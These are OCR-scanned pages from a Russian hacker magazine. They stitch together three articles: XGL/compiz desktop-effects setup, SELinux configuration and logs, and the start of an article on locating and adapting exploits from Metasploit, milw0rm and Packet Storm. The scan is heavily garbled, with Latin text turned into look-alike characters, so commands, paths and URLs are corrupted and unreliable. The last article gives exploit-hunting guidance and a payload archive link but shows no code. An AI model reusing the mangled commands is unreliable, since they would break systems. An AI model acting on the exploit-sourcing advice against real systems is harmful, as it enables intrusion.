-бізаЫе-хргіпІ-ѵѵііІі-те5а-5оигсе=../../Ме5а 

# таке 

# таке іпзіаіі 

Делаем рабочий стол в конфеткой 

Вот ты и стал обладателем ОрепОІ_ — ускорен- 
ного Х-сервера. Осталось только разобраться 
с тем, как его запустить и начать использовать. 
Но обо всем по порядку. Для начала нужно за- 
пустить сам ХдІ-сервер. Для этого необходимо 
выйти из иксов и набрать следующую команду: 



Далее мы должны запустить оконный и 
композитный менеджер сотріг: он заменит 
стандартный оконный менеджер графи- 
ческой среды (кѵѵіп или Меіасііу) и позволит 
любоваться красивыми эффектами. К слову 
сказать, сотріг — это пока единственный 
менеджер окон, способный использовать ХдІ 
для создания эффектов, поэтому привер- 
женцы ѴѴіпсІоѵѵМакег и ІІихЬох могут забыть о 
красоте, хотя использовать «голый» ХдІ никто 
не запрещает. Чтобы увидеть рамки на окнах, 
понадобится ѵѵіпсіоѵѵ-бесогаіог, выполненный 
в двух реализациях: ксіе-ѵѵіпсіоѵѵ-бесогаіог и 
дпоте-ѵѵіпсіоѵѵ-сіесогаіог. И только после всех 
приготовлений можно запускать КЭЕ или 
Опоте. Приведенный ниже скрипт загружает 
все вышеописанное автоматически: 

# ѵі /ор1/Х1 1 /Ьіп/зіабхаі 
#!/Ьіп/зІі 

# ХдІ-сервер 

ЦО_РРЕЦОАО=/изг/ІіЬ/ІіЬ(ЗІ_.5о\ 

/орі/ХІ 1/Ьіп/ХдІ :1 -ас -ассеі дІх:рЬіЖег 
-ассеі хѵ:рЬіЖег& 

# говорим, чтобы обращались только к Х-серверу : 1 
ехрогШІЗРІ_АѴ=:1 




Схематическое изображение АІСІ-Х 



Схематическое изображение Хдіх 
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ІЛЧІХІСЮ 



# оконный и композитный менеджер сотріг 
/орІ/Х11/Ьіп/сотрІ2 -геріасе сіесогаііоп ѵѵоЬЫу !асІе 
тіпітіге сиЬе гоіаіе 200 т зсаіе тоѵе гезіге ріасе 
з\л/і1;сИег & 

# рамки для окон 

/орІ/ХІ 1/Ьіп/кбе-ѵѵіпсІоѵѵ-сІесогаІог & 

# ну и, конечно же, КЭЕ 
ехес зіаііксіе 

Обрати внимание на строку «ехрогі ЭІЗРІ-АѴ 
=:1». В начале статьи я уже говорил, что ХдІ 
запускается поверх обычного Х-сервера и 
поэтому получает адрес : 1 (а не :0 как обычно). 
Аргументы команды сотріг указывают на то, 
какие плагины будут использоваться в менед- 
жере окон. Ниже приведен список плагинов с 
описанием: 

бесогаііоп — рамки окон (нужен *-ѵѵіпбоѵѵ- 
бесога!ог); 

ѵѵоЬЫу — трансформация окна при перетас- 
кивании; 

Іабе — плавное появление и исчезновение 
окна; 

тіпітіге — эффект сворачивания и развора- 
чивания окна; 

сиЬе — рабочие столы размещаются на сто- 
ронах куба; 

гоіаіе — часть эффекта сиЬе, позволяющая 
ему чудесным образом вращаться; 

200171 — эффект лупы; 
зсаіе — автокомпоновка окон; 
тоѵе — перемещение окон; 
гезіге — изменение размеров окна; 
ріасе — умное размещение окон; 
зѵѵіІсЬег — переключение между окнами. 
Также можно указать всего один плагин 
«дсопі» и подключать/отключать плагины 
с помощью графической утилиты дсопі- 
ебііог. Сразу после запуска ХдІ ты сможешь 
насладиться многими эффектами сотріг, но 
для достижения нирваны придется выучить 
несколько клавиатурных комбинаций: 
АІі+удерживание левой клавиши мыши — пе- 
ремещение окна; 

АІІ+СігІ -і-удерживание левой клавиши мыши 

— перемещение окна с прилипанием к грани- 
цам рабочего стола; 

АІ1; -і-удерживание правой клавиши мыши — из- 
менение размеров окна; 

СітІ-ьЗЫІІ 4-колесико мыши — плавное измене- 
ние прозрачности окна; 

АІІ4-ТаЬ — переключение между окнами; 
СігІ-гАІІ-і-влево/вправо — вращение куба (сме- 
на рабочего стола); 

СігІ-ьЗЫІІ-ьАІІ-і-влево/вправо — вращение куба 
с отображением текущего окна; 
СГгІ-гАІІ-і-удерживание левой клавиши мыши 

— свободное вращение куба движением 
мыши; 

ѴѴіп-і-правый клик мыши — эффект лупы; 
ѴѴіп-і-колесико — эффект лупы с плавным 
зумом; 

Р1 2 — автокомпоновка окон. 

Вместо того чтобы запускать ХдІ руками, 



3 

Кбе-ѵѵіпбоѵѵ-бесога!ог на многих системах 
работать отказывается, но ты можешь 
использовать дпоте-ѵѵіпбоѵѵ-бесога!ог со 
всеми графическими средами. 



можно настроить кбт или дбт для его автома- 
тического запуска. Для КОЕ следует добавить 
строку «ЗегѵегСтб=/орі/Х1 1/Ып/ХдІ :1 -ас 
-ассеі дІх:рЬиІІег -ассеі хѵ:рЬиІІег» в файл /орі/ 
кбе/зЬаге/сопІід/кбт/кбтгс и дописать в файл 
/орІ/кбе/зЬаге/сопІід/кбт/ХзІаіІир две строки: 

/орѴХ1 1 /Ьіп/сотрІ 2 -геріасе бесогаііоп ѵѵоЬЫу !абе \ 
тіпітіге сиЬе гоіаіе гоот зсаіе тоѵе 
гезіге ріасе зѵѵіІсНег & 

/орѴХІ 1/Ьіп/кбе-ѵѵіпбоѵѵ-сІесога{ог& 

Для (Зпоте потребуется открыть файл /еіс/ 

XI 1/дбт/дбт.сопІ, затем в секции «[зегѵегз]» 
заменить строку «0=3!апбагб" на "1=ХдІ» и 
добавить: 

[зегѵег-ХдІ] 

пате=ХдІ 

соттапсІ=/орѴХ1 1/Ып/ХдІ :1 -ас -ассеі дІх:рЬи!Іег 

-ассеі хѵ:рЬи!Іег 

!ІехіЫе=!гие 

Красота-то какая, лепота 

Первое, что бросается в глаза, — это, конечно 
же, эффекты. Эффектов много, и все они 
выполнены очень качественно и красиво. 
Прозрачность окон, выпрыгивающие как 
бы из вакуума меню, растягивающиеся при 
перетаскивании окна, смена рабочего стола, 
выполненная в виде вращающегося куба, 
сворачивание, разворачивание и переключе- 
ние окон — все это действительно впечатляет. 
Рабочий стол оживает и притягивает к себе 
внимание. Равнодушным не останется никто: 
ни заядлый КОЕ'шник, ни аскет-консолыщик. 
Особенно впечатляет эффект, проявляющийся 
при попытке «отодрать» окно от края экрана, 
при этом само окно растягивается, как пиявка, 
а после отсоединения от бордюра плавно при- 



3 

На прилагаемом к журналу диске ты най- 
дешь дерево исходников из СУЗ, а также 
скрипты для автоматической сборки и 
запуска ХдІ. 



нимает прежнюю форму. Все существовавшие 
ранее эффекты по сравнению с этим кажутся 
блеклыми и несуразными. Добро пожаловать в 
новый дивный цифровой мир! 

Второе — это скорость отрисовки графики. 

Ее прирост можно оценить даже на глаз. КОЕ 
становится просто молниеносным — абсолют- 
но никаких задержек в открытии меню и пере- 
мещении окон, текст прокручивается быстро и 
без багов. Можно с уверенностью утверждать, 
что пройдет совсем немного времени, прежде 
чем рабочий стол любого настольного ПК 
будет основан на Ореп(ЗІ_, и мы навсегда забу- 
дем о тормозах и ограничениях 2Э-режима. 

гесі Наі Ѵ8 поѵеІІ 

ХдІ — не единственный проект, позволяю- 
щий перевести Х-сервер на рельсы ОрепѲІ_. 
Одновременно с открытием исходников ХдІ 
компания Веб На! и Х-консорциум разработа- 
ли свою версию ускоренного Х-сервера под 
названием АІ(ЗІ_Х (Ассеіегаіеб Іпбігес! (ЗІ_Х). 
Причем поводом для изобретения велосипеда 
послужил тот факт, что Дэвид Рэвеман вел 
разработку закрыто, не консультируясь с 
сообществом Ореп Зоигсе, а затем выпустил 
готовый продукт, не заботясь о том , всем ли 
понравится его реализация. В отличие от ХдІ, 
который требует больших вмешательств в 
низкоуровневую часть х.огд . АКЗІ_Х позволяет 
путем минимальной модификации сущест- 
вующего Х-сервера (необходимо несколько 
расширений) и библиотеки Меза получить 
ускоренный Ореп(ЗІ_ Х-сервер. Проблема 
архитектуры АКЗІ_Х состоит лишь в том, что 
для его работы необходимы специальные 
видеодрайвера, поддерживающие технологию 
ОРІ. Компания пѴібіауже заявила о своем на- 
мерении создать такие драйвера сразу после 
того, как код АКЗІ_Х стабилизируется, ос 



Трансформация окна при перетаскивании 
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СЕГОДНЯ МЫ ПОГОВОРИМ О ЗЕШУХ — ОДНОЙ ИЗ САМЫХ ПОПУЛЯРНЫХ СИС- 
ТЕМ УПРАВЛЕНИЯ ДОСТУПОМ. ПОМИМО ЗЕШІІХ СУЩЕСТВУЮТ ЕЩЕ ОВЗЕСЦВІТѴ 
И І_Ю5, НО САМОЙ СТРОГОЙ ИЗ НИХ ЯВЛЯЕТСЯ ИМЕННО ЗЕШІІХ. БЛАГОДАРЯ 
ПРАВИЛЬНОЙ НАСТРОЙКЕ ЭТА СИСТЕМА НИ РАЗУ НЕ БЫЛА ВЗЛОМАНА. ТАК КАК 
ОБЪЕМ ПУБЛИКАЦИИ НЕ ПОЗВОЛЯЕТ ПОЛНОСТЬЮ ОПИСАТЬ ЗЕШУХ, МЫ ОСТА- 
НОВИМСЯ ТОЛЬКО НА ОСНОВНЫХ ПОНЯТИЯХ И КОНЦЕПЦИЯХ ЭТОЙ СИСТЕМЫ. 
БОЛЬШАЯ ЧАСТЬ СТАТЬИ БУДЕТ ПОСВЯЩЕНА ПРАКТИЧЕСКОЙ НАСТРОЙКЕ, А, 
ЕСЛИ ТЫ ЧТО-ТО НЕДОПОНЯЛ ИЗ ТЕОРИИ, ВО ВРЕЗКЕ ТЫ НАЙДЕШЬ СПИСОК ДО- 
ПОЛНИТЕЛЬНЫХ РЕСУРСОВ. 
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Зачем это надо? 

Ыпих при правильной настройке считается одной из самых защищенных 
операционных систем мира. Так зачем нужна дополнительная системауп- 
равления доступом? Неужели не хватает возможностей самой І_іпих? Нет, 
не хватает. В І_іпих есть два типа пользователей: обычный пользователь и 
администратор (гооі). Права обычных пользователей можно ограничить 
и с помощью штатных средств І_іпих. Но что находится во власти адми- 
нистратора, ты и сам знаешь. Если злоумышленник завладеет паролем 
администратора, то он получит полную власть над системой. Но если на 
компьютере установлена система управления доступом, то она не позво- 
лит ему сделать ничего криминального. Злоумышленник просто не сможет 
причинить ощутимый вред скомпрометированному хосту. Системауправ- 
ления доступом может ограничить даже действия самого пользователя 
гооі, если они могут стать причиной некорректной работы системы (на- 
пример, угрожать целостности данных, работе самой системы и т.д.). 
Вернемся к обычным пользователям. Здесь можно задавать ограниче- 
ние на доступ к определенным файлам и на использование системных 
ресурсов — дискового пространства (квоты), процессорного времени, 
устанавливать максимальное число процессов — и все. Система управ- 
ления доступом может запретить пользователю выполнять те действия, 
которые он не должен выполнять. Во многих случаях даже обычным поль- 
зователям часто предоставляются чрезмерные полномочия. Например, 
зачем пользователю, который зарегистрировался в системе только для 
чтения почты, предоставлять возможность компиляции исходного кода 
или запуска фоновых демонов?Теперь все становится насвои места: мы 
понимаем, что без ЗЕЫпих в настоящей многопользовательской системе 
не обойтись. Справедливости ради стоит отметить, что описанные выше 
фичи также можно организовать, используя (ЗгЗесигіІу или і_ЮЗ. 

Кроме всего прочего, ЗЕЫпих контролирует и права доступа к файлам. 
Например, система проверила права доступа файла и разрешила к нему 
доступ. Но потом принимается за работу ЗЕЫпих. Если в настройках 
ЗЕЫпих указано, что данный пользователь (или процесс) не имеет досту- 
па к файлу, тогда уже ЗЕЫпих запрещает к нему доступ. И в самом деле, 
зачем ѴѴеЬ-серверу обращаться к каталогу /еіс/зеііпих? Если же система 
запретила доступ к файлу (первый этап — проверка прав доступа), тогда 
ЗЕЫпих не задействуется. 

Как устанавливать $ЕЫпих? 

Давай упростим друг другу жизнь и не будем устанавливать систему на 
«голый» Ыпих. ЗЕЫпих входит в состав Ребога Соге (кстати, ЕС стал пер- 
вым дистрибутивом, в состав которого была включена ЗЕЫпих) и дистри- 
бутивов, основанных на нем. Настройку ЗЕЫпих будем рассматривать на 
примере АЗР Ыпих 1 1 — самого свежего ЗЕЫпих-дистрибутива, который 
имеется под рукой. 

Перейди в каталог /еіс/зеііпих. Здесь ты найдешь файл сопіід, управляю- 
щий настройками самой ЗЕЫпих, а также каталог Іагдеіеб, в котором бу- 
дут находиться конфигурационные файлы политики Гагдеіеб. В нем будут 
три подкаталога: сопіехіз, роіісу, изегз (контексты, политика, пользова- 
тели), атакже файл Ьооіеапз, в котором установлены некоторые булевые 
(логические) параметры. Вообще, этот файл руками трогать не нужно 
— посмотрели и забыли. Во всяком случае, на данном этапе. Итак, что же 
находится в каталогах сопіехіз, роіісу и изегз? Чтобы получить ответ на 



этот вопрос, нужно обратиться к скучной теории. 

Скучная теория 

Начнем с базового понятия — понятия сущности. Сущность (ібеп%) 
формирует часть контекста безопасности, задающего домены, в кото- 
рые можно войти. То есть сущность определяет, что можно сделать. Не 
нужно путать сущность с идентификатором пользователя (ІІЮ). Они па- 
раллельно существуют в системе, но смысл их существования абсолют- 
но разный. Обычно сущность представляется в системе также, как и имя 
пользователя. Если в системе есть пользователь беп и есть сущность 
беп, выполнение команды зи не изменяет сущности ЗЕЫпих. Предполо- 
жим, у нас есть пользователь беп. Зарегистрируемся под ними выполним 
команду іб (это команда ЗЕЫпих). Вывод: 

сопіехі=беп : и8ег_г: изеМ: 

Теперь введем команду зи, наберем пароль гооі и снова введем іб: 
сопІехІ=беп:изег_г:изеМ: 

Мы получили тот же самый вывод. Как видишь, контекст остался пре- 
жним и не изменился на контекст пользователя гооі. Правда, есть одно 
«но». Если сущности беп разрешен доступ к роли зузабт_г (сейчас 
роль — изег_г), и пользователь выполнит команду «пеѵѵгоіе -г зузабт_г» 
(изменить свою роль), а потом снова наберет іб, то получит вывод: 

сопІехІ=беп:зузабт_г:зузабт_1 

Сущность та же, но роль и домен (второе и третье поле) изменились. 
Сущность определяет, какие роли и домены могут быть использованы. 
Домен (ботаіп) предоставляет список операций, которые может вы- 
полнить процесс по разным типам, точно определяет его привилегии. 
Примеры доменов: зузабгтЦ: — домен администратора системы, изеМ: 

— домен для непривилегированных пользователей. Процесс іпіі: выпол- 
няется в домене іпіЩ а патеб — в патеб_1 

Тип Дуре) задается для объекта и определяет доступ к этому объекту. Тип 

— это то же самое, что и домен, но если домен относится к процессам, то 
тип — к файлам, каталогам, сокетам ит.п. 

Роль (гоіе) определяет список доменов, которые могут быть использова- 
ны. Домены, разрешенные для пользовательской роли, определяются в 
файлах политики. Если у роли нет доступа к домену, то при попытке вы- 
полнения действия с доменом, доступ будет запрещен. Лучше всего это 
продемонстрировать на примере: если тебе нужно разрешить неприви- 
легированным пользователям (домен изеМ:) выполнить команду раззѵѵб, 
то в конфигурационном файле нужно прописать: 

гоіе изег_г іурез изеіщэаззѵѵбЩ 

Из команды видно, что пользователь с ролью изег_г может входить в до- 
мен изег_раззѵѵб_1, то есть может выполнить команду раззѵѵб. 

Контекст безопасности (зесигііу сопіехі) — это набор всех атрибутов, ко- 
торые связаны с файлами, каталогами, процессами, ТСР-сокетами. Кон- 
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ЗЕЫпих (от англ. Зесигку-ЕпНапсесІ Ыпих — Линукс с улучшенной безо- 
пасностью) — это специальная версия ядра Линукс и программ, которые 
обеспечивают поддержку принудительного контроля доступа, базирую- 
щегося на принципе наименьших прав. Это не дистрибутив Ыпих, а набор 
изменений, которые могутбыть применены коперационным системам на 
базе ядра Ыпих и некоторым не-І_іпих системам, таким как ВЗЭ. 



текст безопасности состоит из сущности, роли, домена (или типа вместо 
домена). Команда ісі выводит текущий контекст безопасности. 

Решение о переходе фапзШоп) определяется контекстом безопасности, 
который будет назначен выполняемой операцией. Существует два вида 
переходов: 

• переход домена процесса — используется при выполнении процесса 
определенного типа; 

• переход типа файла — используется при создании файла в опреде- 
ленных каталогах. 

Наконец, рассмотрим понятие «политики». Политика — это набор пра- 
вил, контролирующих списки ролей, к которым у пользователя есть до- 
ступ, доступ ролей к доменам, доступ доменов к типам. 

Ты разобрался с доменами/типами/ролями? Смотри, например, выра- 
жение «доступ ролей к доменам» означает, какие пользователи имеют 
право запускать те или иные процессы. А выражение «доступ доменов к 
типу» — какие процессы имеют право доступа к тем или иным объектам 
(файлам, каталогам, сокетам). Редактируя файлы политики, ты можешь 
настроить свою систему так, как пожелаешь. 

Первоначальная настройка ЗЕЫпих 

Зарегистрируйся в системе как пользователь гооі и введи команду: 

• зузіет-сопйд-зесигііуіеѵеі 

В окне «Настройка уровня безопасности » перейди в закладку «Настрой- 
ка ЗЕЫпих». По умолчанию ЗЕЫпих обычно выключена. Для ее включе- 
ния установи флажок «Включено». Сразу после этого ты увидишь пре- 
дупреждение о необходимости перемаркировать файловую систему 
правильными контекстами безопасности. В этом же окне сообщается, 
что перемаркировка(онабудетвыполненапосле перезагрузки системы, 
кстати, это аналогкоманды «таке геІаЬеІ»)можетзанять довольно много 
времени (зависит от размера файловой системы). 

После этого обрати внимание на окно «Настройка ЗЕЫпих». В нем можно 
выбрать тип политики. Пока доступна только одна политика — Іагдеіеб 
(целевая). Теперь нажми кнопку «ОК» и перезагрузи компьютер коман- 
дой «гебооі». В процессе старта системы появится сообщение: 

ѴѴагпіпд -- ЗЕЫпих геІаЬеІ із гециігесі *** 

Что свидетельствует о том, что ЗЕЫпих будет перемаркировывать фай- 
ловую систему. После этого пойдет привычная для тебя загрузка. Но при 
входе в X ѴѴіпбоѵѵ на первую консоль будет выведено несколько не сов- 
сем обычных сообщений. Здесь ничего страшного нет — их формат мы 
разберем чуть позже. Первое, что хочется сделать, — это ввести команду 
ісі, чтобы просмотреть свой контекст безопасности: 

сопіехІ=гооі:зузІет_г:Гю1:рІид_і 

Роль зуз!ет_г — это роль системы, которая выше роли зузасІт_г. 

Теперь самое время обратиться к конфигурационным файлам ЗЕЫпих. 
Открой файл/еІс/зеІіпих/сопІід.Внембудутвсегодведирективы:ЗЕІ_ІШХ 
и ЗЕЫШХТѴРЕ. Первая может принимать следующие значения: 

• епЬгсіпд — применить политику безопасности ЗЕЫпих 

• регтіззіѵе — режим отладки (вместо запрета тех или иных операций ЗЕЫпих бу- 
дет 

просто выводить предупреждения) 

• бізаЫесІ — ЗЕЫпих отключена 

Для второй директивы возможны два значения: 

• іагдеіеб — будут защищены только целевые сетевые демоны (которые будут явно 




указаны) 

# зігісі — полная защита 

Если тебе нужна полная защита, установи пакет зеііпих-роіісу-зігісы Он 
находится на первом СО АЗРЫпих 1 1 . Со второго компакта я бы посове- 
товал установить пакет зеііпих-бос. Дополнительная документация ни- 
когда не помешает. Для аудита политик ЗЕЫпих используется программа 
зеаибіі, но при запуске мы получаем сообщение, что не установлена по- 
литикапоумолчанию. Интересното,чтонадистрибутивныхдискахятаки 
не нашел пакет роіісу, содержащий эту дефолтную политику. Пришлось 
качнуть его из интернета: І1р://гртІіпб.пе1/Ііпих/АЗРЫіпих/і386/РРМ3.10/ 
роіісѵ-і .1 1 .3-З.поагсН.грт . 

Выбор роли 

Роль имеет большое значение, ведь у каждой роли свои полномочия. 
Например, у зузабт_г полномочий намного больше, чем у изег_г, поэтому 
нужно знать, как можно изменить роль. Хотя, с другой стороны, у Іагдеіеб, 
в которой мы сейчас работаем, роли пользователей особого интереса 
не представляют, поскольку осуществляется защита только выбранных 
сетевых демонов. Но о команде пеѵѵгоіе сказать все-таки нужно. Ее син- 
таксис следующий: «пеѵѵгоіе -г роль». Например: 

# пеѵѵгоіе -г зузасІт_г 

После этого нужно будет ввести пароль для сущности (пароль пользо- 
вателя). Если прав доступа к указанной роли нет, то ты увидишь сооб- 
щение: 

сІеп:зузасІт_г:зузасІт_1 із поі а ѵаііб сопіехі 

В этом случае указывается, что сущность беп не имеет права доступа к 
ролизузасІт_г. 

Псевдофайловая система /веііпих 

При запуске системы с поддержкой ЗЕЫпих в корне появится каталог 
/зеііпих — это псевдофайловая система ЗЕЫпих (наподобие /ргос). С по- 
мощью этой ФС можно изменять некоторые параметры ЗЕЫпих, напри- 
мер, режим работы. Как уже было отмечено, есть два режима работы: 
разрешающий (регтіззіѵе) и принудительный (епіогсіпд). В первом ре- 
жиме ЗЕЫпих только ругается, и ОС работает так же, как и обычная Ыпих- 
система без ЗЕЫпих, а во втором случае применяются все настроенные 
политики. Отладочные сообщения в разрешающем режиме протоколи- 
руются в файл /ѵаг/Іод/теззадез. Для переключения в принудительный 
режим используется команда: 

# есбо “1 ” > /еіс/зеІіпих/епЫгсе 

Для перехода в разрешающий режим используется команда: 

# есНо “0” > /еІс/зеІіпих/епЫгсе 

Разборки с пользователями 

Лучше добавить всех необходимых пользователей в систему до вклю- 
чения ЗЕЫпих, но бывают такие случаи, когда сделать это просто не- 
возможно (например, система работает продолжительное время, и все 
пользователи давно заведены). Если ЗЕЫпих уже активна, то для добав- 
ления нового пользователя нужно выполнить следующий набор команд. 
Становимся администратором: 

$зи 



114 



ХАКЕР 07 /91/ 06 



э 



Аренда вмртуалыюі і> 
выделенной' сервера 

Как апрапОать собственные ожидания 



В ІІІМІХ может использоваться одна из следующих моделей доступа: 

• дискретное управление доступом (Оізсгеііопагу Ассезз Сопігоі, ОАО); 

• принудительное управление доступом (МапсІаІогуАссезз Сопігоі, МАО); 

• модель тип-домен (Оотаіп Туре Епіогсетепі, ОТЕ). 



Входим в роль зузасІт_г: 

• пеѵѵгоіе -г зузасІт_г 
Добавляем нового пользователя: 

• изегасісі -с “ІЧеѵѵ изег” -т -сі Люте/пеѵѵизег -д изегз\ 

-з /Ьіп/ЬазИ -и 1 005 пеѵѵизег 

• раззѵѵсі пеѵѵизег 

Но этого мало. Также требуется настроить роли пользователя. Для этого 
в фаілп/еіе/зеііпих/изегз добавляем строку: 

изег пеѵѵизег гоіез { изег_г }; 

Таким образом мы назначаем пользователю пеѵѵизег роль изег_г. Если 
тебе нужно, чтобы пользователь имел доступ к нескольким ролям, — тог- 
да укажи несколько ролей через пробел, например: 

изег зеіезі гоіез { изег_г зузасІт_г }; 

Для активации изменений введи команду: 

• таке -С /еіе/зеііпих ІоасІ 

По окончании этой операции ты увидишь такие сообщения: 

Зиссезз 

іоисГіітр/ІоасІ 

таке: І_еаѵіпд сіігесіогу Уизг/зГіаге/зеІіпих/роІісу/сиггепІ:’ 

Отмечу, что если пользователю нужен доступ только к роли изег_г, то это 
можно даже не указывать. Явное указание необходимо лишь в случае, 
когда пользователю требуется изменить свой пароль самостоятельно. 

Влезаем в политику 

Теперь начинается самое интересное. Мы будем редактировать нашу 
политику. Сейчас используется политика Іагдеіеб, подразумевающая за- 
щиту только указанных тобой сетевых демонов. Запусти конфигуратор 
зузіет-сопіід-зесигііуіеѵеі. На закладке ЗЕЫпих появится возможность 
редактирования политики. Там все просто: приводится список служб и 
для каждой службы набор опций ЗЕЫпих. Например, вот список опций 
для РТР: 

• выключить защиту ЗЕЫпих для демона йрсі; 

• выключить защиту ЗЕЫпих для демона іпіісі; 

• разрешить йр читать/записывать файлы в домашних каталогах. 

А вот список привилегий пользователя: 

• позволить пользователям читать любые файлы по умолчанию; 

• разрешить пользователям запускать рррсі-соединения. 

Читаем сообщения ВЕЫпих 

Рассмотрим пример типичного ругательства ЗЕЫпих, которое можно об- 
наружить в/ѵаг/Іод/теззадез : 

Мау21 14:44:12 ІосаІГюзі кегпеі: аисііі: (11 48208252.61 0:29): аѵс: сіепіесі { 
геасі } Іог рісІ=2054 сотт=”ЬазГі” пате=”.ЬазГі_ргоРІе” сІеѵ=ГісІа6 
по=23695 зсопіехі=гооі:зузіет_г:ГюірІид_исопіехі=гооі:оЬіесі_г:изег_ 
Гюте_ПсІазз=РІе 

Строка «аѵс: сіепіесі» означает, что операция была запрещена. Далее 
следует идентификатор процесса, пытающегося выполнить операцию 
(Іог ріб), имя процесса (соплпл), имя объекта (пате), имя устройства 
(беѵ), номер инода объекта (іпо), контекст безопасности процесса 
(зсопіехі), контекст безопасности объекта (Ісопіехі) — в данном случае 
это файл « .ЬазРі_ргоТМе» и тип целевого объекта (ІсІазз=ТіІе — тип объ- 
екта — файл). =н= 
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ІІПІХІОСІ 




КРИС КАСПЕРСКИ 

Мастерская 
бравого хакера 

Заточи эксплоит под себя! 
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В СЕТИ ВАЛЯЕТСЯ МНОЖЕСТВО ДЕМОНСТРАЦИОННЫХ (РВООР-ОР-СОЫСЕРТ) 
ЕХРЮІТ'ОВ, СОЗДАЮЩИХ ФАЙЛ НА «ЖЕРТВЕННОМ» ДИСКЕ ИЛИ ВЫВОДЯЩИХ 
СООБЩЕНИЕ ОБ УЯЗВИМОСТИ НА ЭКРАН. ДЛЯ АТАКИ НА УДАЛЕННЫЕ СИСТЕМЫ 
ОНИ НЕ ПРИГОДНЫ, И ДАЖЕ ЕСЛИ НАМ ПОСЧАСТЛИВИТСЯ ВСТРЕТИТЬ БОЕВОЙ 
ЕХРІ.ОІТ, ОТКРЫВАЮЩИЙ ЗНЕІ_І_, ТО ВОВСЕ НЕ ФАКТ, ЧТО ОН ЗАВЕДЕТСЯ БЕЗ 
ПРЕДВАРИТЕЛЬНОЙ ДОРАБОТКИ... 




Г павный сайт проекта Меіаехоіоіі Ггатеѵѵогк - универсального атакующе- 
го « движка » с обширной базой свежих ехоіоіі'ов 



Начну с главного — с отречения. Ни к чему де- 
структивному не призываю и употребляю тер- 
мин «хакер» со всем позитивом, на которое 
только способен. Атаковать чужие системы 
можно только с явного разрешения их владель- 
цев, в противном случае это будет не хакерство, 
а чистая уголовщина со всеми вытекающими 
отсюда последствиями. В то же время никакое 
законодательство не запрещает протянуть 
шнурок к приятелю-хакеру и тестировать с ним 
ехріоіі'ы. На этом и закончим. 

Г де брать? 

Поиск новых ехріоіі'ов очень похож на охоту: 
всемирная сеть велика, а дичь гнездится там, 
где ты бы никогда не подумал ее искать. Самые 
свежие ехріоіі'ы обычно выкладываются на не- 
модерируемые хакерские форумы с высоким 
трафиком (среди которых выделяется Іізіз.агок. 
ога.ик/рірегтаіІ/ІиІІ-сІізсІозигеЛ . откуда они с не- 
которой степенью оперативности попадают на 
ѵѵѵѵѵѵ.зесигіМогсиз.сот и другие «накопители 
дыр», превратившиеся в последнее время в 
сплошные помойки, источающие зловонный за- 
пах давно непроветриваемых отстойников. 
Кстати говоря, зесигііуіосиз как-то очень стран- 
ноустроен. В разделе «ехріоіі» обычно присутс- 
твует текст такого рода: «В настоящее время 
мы не знаем об ехріоіі'е для этой дыры. Если ты 
считаешь, что мы ошибаемся, или имеешь более 
свежую информацию, то, пожалуйста, напиши 



нам на ѵиІбЬ@зесигіІу(осиз.сот.» Не верь им! 
Ссылки на ехріоіі'ы часто (но не всегда!) нахо- 
дятся в соседнем разделе — «геіегепсе». Если 
же их там нет — вводишь название дыры (брать 
только значимые слова, например «МісгозоТі: 
Іпіегпеі Ехріогег ЕІпзресіТіесІ ОЕ^ЕСТТад Мегтюгу 
Согшрйоп Ѵагіапі ѴиІпегаЬіІііу», а лучше всего 
отыскивается по запросу «ІЕ ОЕиЕСТ іад»), 
добавляешь ключевое слово «ехріоіі» и идешь 
курить гугл, обязательно обращая внимание на 
дату публикации, а то ведь так недолго и в по- 
запрошлогоднюю дырку залететь, а потом долго 
недоумевать, почему ехріоіі не фурычит. 
Модерируемые форумы (типа Ьидігац на зесіізіз. 
ощ) содержат более концентрированную ин- 
формацию, но для того, чтобы откопать рабо- 
чий ехріоіц приходится очень долго ковыряться. 
Зачем гнаться за свежачком? Все равно, даже 
с учетом ѴѴіпсІоѵѵз Іірбаіе, множество машин 
не латаются годами! Намного проще отпра- 
виться в «лавку ехріок'ов», где выложен раз- 
ный антиквариат, среди которого хотелось бы 
отметить Меіаехроііі Ргатеѵѵогк Ргоіесі (ѵѵ ѵѵѵѵ. 
теіазріоіі.сот ) — своеобразный универсаль- 
ный «движок», изначально написанный на 
РегІ'е, а начиная с версии 3.0, переписанный 
на ВиЬу и работающий как из командной стро- 
ки, так и через ѴѴеЬ-интерфейс. К движку под- 
ключаются «топливные модули» — гибкие и 
высококонфигурабельные ехріоіі'ы, способные 
нести на своем борту любую боевую нагрузку 



(рауіоаб). Собственно говоря, разделение кода 
на «движок», «ехріоіі» и «рауіоаб» есть главное 
преимущество Меіаехроііі Ргатеѵѵогк'а перед 
обычными ехріоіі'ами, где все эти три агрега- 
та свалены в кучу. Поэтому, чтобы подключить 
свою собственную боевую начинку, приходится 
каждый раз разбираться, что, как и куда. Исход- 
ный код движка распространяется бесплатно 
и неплохо документирован. Там же, на сайте 
проекта, можно найти достаточно оперативно 
пополняемую базу ехріоіі'ов и минимальный 
комплект боевой нагрузки ( ѵѵѵѵѵѵ. теіазріоіі. сот/ 
зс/ѵѵіп32тз(20раѵІоабз.1аг.д7 ). 

Другой полезный сайт — МіІѴѴОгт (тіІУѵОгт.сот ) — со- 
держит огромную коллекцию ехріоіі'ов под все- 
возможные системы, достаточно оперативно 
обновляемую и к тому же неплохо классифи- 
цированную, что значительно упрощает поиск, 
избавляя тебя от необходимости качать все под- 
ряд. Здесь же находятся примеры збеІІ-кода с 
готовой боевой нагрузкой и немногочисленный 
инструментарий. 

Популярный Раскеі Зіогт ( ѵѵѵѵѵѵ. раскеізіогт- 
зесигііѵ.огд ) значительно реже обновляется, да и 
коллекция ехріоіі'ов у него победнее будет, зато 
на нем выложено умопомрачительное количест- 
во статей и всякого полезного инструментария: 
от сканеров безопасности до мелких утилит в 
десяток строк. 

Кстати говоря, чаще всего я узнаю о новых ды- 
рах не через форумы, аотзнакомых. Достаточно 
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и/и/и/. МИѴѴОгт. сот — хорошая копилка 
ехоІоН'ов плюс спопоѵчный инструментарий 




завести обширную переписку — и можно быть 
в курсе дел, происходящих на всех континен- 
тах! Ведь силами одного человека отслеживать 
появление всех новых дыр просто нереально, 
разве что полностью посвятить свою жизнь уяз- 
вимостям. 

Чем компилировать? 

Чаще всего ехріоіі'ы пишутся на Си/Си ++, РегІ, 
РуШоп и РНР, реже — на всякой экзотике типа 
Рыбу, причем тип языка указывается далеко не 
всегда, а о версии транслятора и ключах компи- 
ляции остается только догадываться. Вот такая 
культура программирования, с которой нам при- 
ходится жить. 

Ладно, РегІ узнается с первого взгляда по строке 
«#!/изг/Ьіп/регІ», идущей впереди листинга. Если 
